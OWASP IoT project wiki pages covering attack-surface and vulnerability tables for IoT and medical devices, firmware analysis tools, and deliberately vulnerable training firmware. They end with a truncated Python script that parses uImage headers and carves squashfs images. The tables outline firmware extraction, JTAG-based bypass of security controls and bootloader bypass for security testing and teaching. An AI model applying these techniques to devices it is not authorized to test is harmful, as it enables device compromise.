The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook at the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the OWASP IoT Top 10: [[OWASP_Internet_of_Things_Project|OWASP Internet of Things Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the OWASP IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. It will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* Third-party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known vulnerabilities (Heartbleed, Shellshock, outdated PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that makes that service, or the entire device, unavailable<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, the execution of the firmware on the device can be modified, bypassing almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or be used to leak information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, full console access to the device can be obtained<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way for people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH are protected by a strong, non-default password<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing the device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* [https://github.com/fkie-cad/FACT_core Firmware Analysis and Comparison Tool (FACT)]<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
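The "firmware file analysis" and "firmware extraction" steps in the table above, as an added worked example that is not code from the OWASP project or from any of the tools listed: a stdlib-only Python script that validates a U-Boot uImage header by its header and data CRCs, then locates embedded filesystems by their magic bytes and carves a squashfs image using its superblock, the way binwalk does. The firmware image, its header values and the squashfs superblock are constructed inline for the example and are not a real vendor image.<br />
<br />
```python
"""Firmware image triage: find and validate a U-Boot uImage header, then
locate and carve embedded filesystems by their magic bytes (the firmware
file analysis and extraction steps, done by hand instead of with binwalk).
Added example for this page, not OWASP project code. The image bytes are
constructed inline so the script runs offline; a real image comes from a
vendor download, a bootloader dump or a flash chip read.
"""
import struct
import zlib

# U-Boot legacy image header, 64 bytes big-endian: magic, header CRC, time,
# data size, load address, entry point, data CRC, os, arch, type, comp, name.
UIMAGE_MAGIC = b"\x27\x05\x19\x56"
UIMAGE_FMT = ">4sIIIIIIBBBB32s"
UIMAGE_LEN = struct.calcsize(UIMAGE_FMT)  # 64

# Magic bytes a binwalk-style scan reports; the offset is where you carve.
SIGNATURES = {
    b"hsqs": "squashfs (little-endian)",
    b"sqsh": "squashfs (big-endian)",
    b"\x45\x3d\xcd\x28": "cramfs (little-endian)",
    b"\x85\x19\x02\xe0": "jffs2 inode node (little-endian)",
    b"UBI#": "UBI erase-block header",
    b"\x1f\x8b\x08": "gzip stream",
}


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def parse_uimage(blob, offset):
    """Header fields if a CRC-valid uImage header starts at offset, else None."""
    hdr = blob[offset:offset + UIMAGE_LEN]
    if len(hdr) < UIMAGE_LEN or hdr[:4] != UIMAGE_MAGIC:
        return None
    (_, hcrc, _time, size, load, entry, dcrc,
     os_, arch, typ, comp, name) = struct.unpack(UIMAGE_FMT, hdr)
    if crc32(hdr[:4] + b"\0\0\0\0" + hdr[8:]) != hcrc:  # ih_hcrc is zeroed for the CRC
        return None
    payload = blob[offset + UIMAGE_LEN:offset + UIMAGE_LEN + size]
    return {"offset": offset, "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "size": size, "load": load, "entry": entry, "os": os_, "arch": arch,
            "type": typ, "comp": comp,
            "data_crc_ok": len(payload) == size and crc32(payload) == dcrc}


def find_all(blob, needle):
    pos = blob.find(needle)
    while pos != -1:
        yield pos
        pos = blob.find(needle, pos + 1)


def carve_squashfs(blob, offset):
    """Slice out a little-endian squashfs using the superblock's bytes_used
    field (u64 at superblock offset 40)."""
    (bytes_used,) = struct.unpack_from("<Q", blob, offset + 40)
    return blob[offset:offset + bytes_used]


def triage(blob):
    """Whole pass: validated uImage headers, signature hits, carved squashfs images."""
    hits = sorted((p, d) for sig, d in SIGNATURES.items() for p in find_all(blob, sig))
    headers = [h for h in (parse_uimage(blob, p) for p in find_all(blob, UIMAGE_MAGIC)) if h]
    carved = [(p, carve_squashfs(blob, p)) for p, d in hits if d == "squashfs (little-endian)"]
    return {"uimage": headers, "signatures": hits, "squashfs": carved}


def build_sample_image():
    """Constructed image: padding, a uImage-wrapped fake kernel, flash fill,
    then a fake little-endian squashfs rootfs with a consistent superblock."""
    kernel = b"\x7fELF" + b"\0" * 60 + b"fake-kernel-body"
    hdr = struct.pack(UIMAGE_FMT, UIMAGE_MAGIC, 0, 0x5F000000, len(kernel), 0x80000000,
                      0x80000000, crc32(kernel), 5, 7, 2, 0, b"Linux-4.4.0-example")
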